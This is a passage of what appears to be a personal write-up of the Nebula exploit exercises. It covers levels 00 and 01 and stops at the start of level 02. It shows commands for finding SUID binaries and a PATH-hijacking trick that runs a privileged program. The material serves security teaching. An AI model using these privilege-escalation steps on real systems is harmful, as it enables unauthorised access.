Nebula Exploit Exercises

Level00

Nebula level00.

SSH to the server, and log in as 'level00' with the password 'level00' as instructed.

The challenge is to find a program with the suid-bit set, which means that it will execute as the owner of the program, not the user who runs it. In order to do this, I ran:

find / -perm -u=s -type f 2>/dev/null

Which returned a couple of normal files, but also this one:

/bin/.../flag00

I ran /bin/.../flag00, followed by getflag, and the challenge was done.

[email protected]:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
[email protected]:~$ getflag
You have successfully executed getflag on a target account
[email protected]:~$ 

Level01

Nebula level01.

SSH to the server, and log in as 'level01' with the password 'level01' as instructed.

The challenge is:
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

The flaw is that it's using the user's environment ($PATH) to search for the 'echo' program. This can easily be manipulated by changing the PATH, then creating a symbolic link named 'echo' that points to 'getflag', and finally running the flag01 program at /home/flag01/flag01:

export PATH=/home/level01/:$PATH
ln -s /bin/getflag echo
/home/flag01/flag01
You have successfully executed getflag on a target account

Level02

Nebula level02.

SSH to the server, and log in as 'level02' with the password 'level02' as instructed.

The challenge is:
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?